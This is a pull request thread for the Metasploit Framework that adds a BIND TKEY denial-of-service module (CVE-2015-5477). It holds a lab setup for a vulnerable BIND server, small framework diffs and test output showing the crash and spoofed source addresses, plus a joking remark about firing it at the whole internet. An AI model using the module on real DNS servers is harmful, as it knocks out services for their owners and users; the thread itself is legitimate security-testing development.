### PR TITLE
Add BIND TKEY DoS

### PR DESCRIPTION
**Pull request by wvu**
I don't even know if this is right, since PacketFu appears to be broken on OS X.

This is a work in progress. I'm still committing to it.

### CODE REVIEW

**Comment by FireFart** [comment]
crashes my test installation. great work!
Here is my setup:
* Download the vulnerable version from ftp://ftp.isc.org/isc/bind9/9.9.7-P1/ (I used the windows x64)
* Extract the zip file
* Execute `.\rndc-confgen.exe > rndc.conf` in the extracted folder
* Create the following files in the extracted folder

`root.servers`

```
;       This file holds the information on root name servers needed to
;       initialize cache of Internet domain name servers
;       (e.g. reference this file in the "cache  .  <file>"
;       configuration file of BIND domain name servers).
;
;       This file is made available by InterNIC
;       under anonymous FTP as
;           file                /domain/named.cache
;           on server           FTP.INTERNIC.NET
;       -OR-                    RS.INTERNIC.NET
;
;       last update:    Jan 3, 2013
;       related version of root zone:   2013010300
;
; formerly NS.INTERNIC.NET
;
.                        3600000  IN  NS    A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET.      3600000      A     198.41.0.4
A.ROOT-SERVERS.NET.      3600000      AAAA  2001:503:BA3E::2:30
;
; FORMERLY NS1.ISI.EDU
;
.                        3600000      NS    B.ROOT-SERVERS.NET.
B.ROOT-SERVERS.NET.      3600000      A     192.228.79.201
;
; FORMERLY C.PSI.NET
;
.                        3600000      NS    C.ROOT-SERVERS.NET.
C.ROOT-SERVERS.NET.      3600000      A     192.33.4.12
;
; FORMERLY TERP.UMD.EDU
;
.                        3600000      NS    D.ROOT-SERVERS.NET.
D.ROOT-SERVERS.NET.      3600000      A     199.7.91.13
D.ROOT-SERVERS.NET.      3600000      AAAA  2001:500:2D::D
;
; FORMERLY NS.NASA.GOV
;
.                        3600000      NS    E.ROOT-SERVERS.NET.
E.ROOT-SERVERS.NET.      3600000      A     192.203.230.10
;
; FORMERLY NS.ISC.ORG
;
.                        3600000      NS    F.ROOT-SERVERS.NET.
F.ROOT-SERVERS.NET.      3600000      A     192.5.5.241
F.ROOT-SERVERS.NET.      3600000      AAAA  2001:500:2F::F
;
; FORMERLY NS.NIC.DDN.MIL
;
.                        3600000      NS    G.ROOT-SERVERS.NET.
G.ROOT-SERVERS.NET.      3600000      A     192.112.36.4
;
; FORMERLY AOS.ARL.ARMY.MIL
;
.                        3600000      NS    H.ROOT-SERVERS.NET.
H.ROOT-SERVERS.NET.      3600000      A     128.63.2.53
H.ROOT-SERVERS.NET.      3600000      AAAA  2001:500:1::803F:235
;
; FORMERLY NIC.NORDU.NET
;
.                        3600000      NS    I.ROOT-SERVERS.NET.
I.ROOT-SERVERS.NET.      3600000      A     192.36.148.17
I.ROOT-SERVERS.NET.      3600000      AAAA  2001:7FE::53
;
; OPERATED BY VERISIGN, INC.
;
.                        3600000      NS    J.ROOT-SERVERS.NET.
J.ROOT-SERVERS.NET.      3600000      A     192.58.128.30
J.ROOT-SERVERS.NET.      3600000      AAAA  2001:503:C27::2:30
;
; OPERATED BY RIPE NCC
;
.                        3600000      NS    K.ROOT-SERVERS.NET.
K.ROOT-SERVERS.NET.      3600000      A     193.0.14.129
K.ROOT-SERVERS.NET.      3600000      AAAA  2001:7FD::1
;
; OPERATED BY ICANN
;
.                        3600000      NS    L.ROOT-SERVERS.NET.
L.ROOT-SERVERS.NET.      3600000      A     199.7.83.42
L.ROOT-SERVERS.NET.      3600000      AAAA  2001:500:3::42
;
; OPERATED BY WIDE
;
.                        3600000      NS    M.ROOT-SERVERS.NET.
M.ROOT-SERVERS.NET.      3600000      A     202.12.27.33
M.ROOT-SERVERS.NET.      3600000      AAAA  2001:DC3::35
; End of File
```

`sectest.zone`

```
$ORIGIN sectest.
$TTL 1h
@   IN  SOA ns1.sectest.   hostmaster.sectest. (
                2015061913
                10
                10
                3600
                10
)

; A Records
@   1800    IN  A       8.8.8.8
ns1 1800    IN A 127.0.0.1

@   3600    IN  NS      ns1.sectest.
```

`named.conf`

```
options {
  directory "C:\Users\XXXXX\Downloads\BIND9.9.7-P1.x64";
  session-keyfile "session.key";
  version "not currently available";
  pid-file "named.pid";
  recursion yes;
  
};

 key "rndc-key" {
       algorithm hmac-md5;
       secret "YYYYYYY";
 };

 controls {
       inet 127.0.0.1 port 953
               allow { 127.0.0.1; } keys { "rndc-key"; };
};

  logging{
  channel my_log{
    stderr;
    severity info;
  };
  category default{ my_log; };
  category security { my_log; };
  category queries { my_log; };
};
zone "." {
  type hint;
  file "root.servers";
};

zone "sectest" {
        type master;
        file "sectest.zone";
};
```
* Replace the secret in named.conf (`YYYYYYY`) with the secret mentioned in `rndc.conf`
* Run bind with `.\named.exe -c .\named.conf -f -g`

**Comment by FireFart** [comment]
@wvu-r7 I had to set the `CHOST` to my real ip to get it working. Otherwise I got
`[-] Fatal: The source IP (CHOST) value of 1.3.3.7 was not usable`

Also can someone also verify this module in a linux installation?

**Comment by wvu-r7** [comment]
@FireFart: Didn't see your comment till just now. I've already changed it to ```0.0.0.0```, since it wasn't working for me on OS X. @jvazquez-r7 had a successful test on Linux.

**Comment by wvu-r7** [comment]
@FireFart: Didn't see your comment till just now. I already changed it to ```0.0.0.0```, but it's still not working for me on OS X. @jvazquez-r7 successfully sent the packet on Linux, though.

**Comment by wvu-r7** [comment]
Scratch that. That didn't do what I wanted it to do. Changed the code again.

**Comment by wvu-r7** [comment]
@FireFart: Still working on it. Pushed early.

**Comment by FireFart** [comment]
@wvu-r7 no prob take your time :)

**Comment by wvu-r7** [comment]
@FireFart: If you test it now, source address spoofing should work. I was overloading ```CHOST``` because it was convenient, but it was causing problems with the mixins. :)

File: lib/msf/core/auxiliary/udp_scanner.rb [hunk 1]
```diff
@@ -97,6 +97,7 @@ def scanner_send(data, ip, port)
     resend_count = 0
     begin
 
+      print_status("Sending packet to #{ip}")
```
Comment (FireFart) [inline lib/msf/core/auxiliary/udp_scanner.rb]: @wvu-r7 looks like many modules using `UDPScanner` print their own message before sending, Example: modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb so maybe make this one a `vprint_status`?

File: lib/msf/core/exploit/capture.rb [hunk 2]
```diff
@@ -250,7 +250,7 @@ def capture_sendto(payload="", dhost=nil, bcast=false, dev=nil)
       # The return value either be a PacketFu::Packet object, or nil
       def inject_reply(proto=:udp, pcap=self.capture)
         # Defaults to ~2 seconds
-        to = (datastore['TIMEOUT'] * 4) / 1000.0
+        to = ((datastore['TIMEOUT'] || 500) * 4) / 1000.0
```
Comment (FireFart) [inline lib/msf/core/exploit/capture.rb]: the other occurences in this file use `.to_f` too:
`to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0` https://github.com/wvu-r7/metasploit-framework/blob/feature/bind_tkey/lib/msf/core/exploit/capture.rb#L314

File: lib/msf/core/auxiliary/udp_scanner.rb (hunk 1 above)
Comment (wvu-r7) [inline lib/msf/core/auxiliary/udp_scanner.rb]: Trying to mimic line 87, but now that sounds like trouble.

File: lib/msf/core/exploit/capture.rb (hunk 2 above)
Comment (wvu-r7) [inline lib/msf/core/exploit/capture.rb]: Good catch. :)

**Comment by wvu-r7** [comment]
Rebase all the things! Idk, guess I'm not in the mood to make separate commits. :/

**Comment by todb-r7** [comment]
@wvu-r7 and @FireFart , added some dressup to the module, including discoverer credit, over on wvu-r7#12

Also, Works for Me:

```
# tshark -i lo -f "dst port 53" -n -T fields -e dns.qry.name -e dns.qry.type -e dns.qry.class -e dns.resp.name -e dns.resp.type -e dns.resp.class -c 1
Capturing on 'Loopback'
PTyavPCv6rfYxvZRzhBSptZP7OVj6KYbWwpiMq8hG	0x00f9	0x0001	PTyavPCv6rfYxvZRzhBSptZP7OVj6KYbWwpiMq8hG	0x0010	0x0001
1 
```

Since there's an additional record of a non-TKEY type, looks like it all lines up with the vuln as described.

**Comment by todb-r7** [comment]
I'll land this in a bit unless someone beats me to it. My updates are all text, and renders just fine:

```
msf auxiliary(bind_tkey) > info

       Name: BIND TKEY Query Denial of Service
     Module: auxiliary/dos/dns/bind_tkey
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-07-28

Provided by:
  Jonathan Foote
  throwawayokejxqbbif
  wvu <wvu@metasploit.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  BATCHSIZE  256              yes       The number of hosts to probe in each set
  INTERFACE                   no        The name of the interface
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      53               yes       The target port
  SRC_ADDR                    no        Source address to spoof
  THREADS    10               yes       The number of concurrent threads

Description:
  This module sends a malformed TKEY query, which exploits an error in 
  handling TKEY queries on affected BIND9 'named' DNS servers. As a 
  result, a vulnerable named server will exit with a REQUIRE assertion 
  failure. This condition can be exploited in versions of BIND between 
  BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 
  9.10.2-P2.

References:
  http://cvedetails.com/cve/2015-5477/
  https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/
  https://kb.isc.org/article/AA-01272
  https://github.com/rapid7/metasploit-framework/issues/5790
```

**Comment by todb-r7** [comment]
Also, source host spoofing works like a champ:

As root:

```
msf auxiliary(bind_tkey) > set SRC_ADDR 1.3.3.7
SRC_ADDR => 1.3.3.7
msf auxiliary(bind_tkey) > 

[*] Sending 1 packet(s) to x.x.x.x from 1.3.3.7
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```

In another window:

```
$ tshark -i eth0 -f "dst port 53" -n -T fields -e ip.src -e dns.qry.name -e dns.qry.type -e dns.qry.class -e dns.resp.name -e dns.resp.type -e dns.resp.class -c 1
Capturing on 'eth0'
1.3.3.7	zuh4HOZ8vX1PDUUURIN	0x00f9	0x0001	zuh4HOZ8vX1PDUUURIN	0x0010	0x0001
1 
```

**Comment by FireFart** [comment]
thx @todb-r7 ! so let's do a `set RHOSTS 0.0.0.0/0; run` :D

**Comment by todb-r7** [comment]
Getting authorization might be tricky for that. :)

**Comment by wvu-r7** [comment]
Don't forget to set ```THREADS```!! :P

**Pull request merged**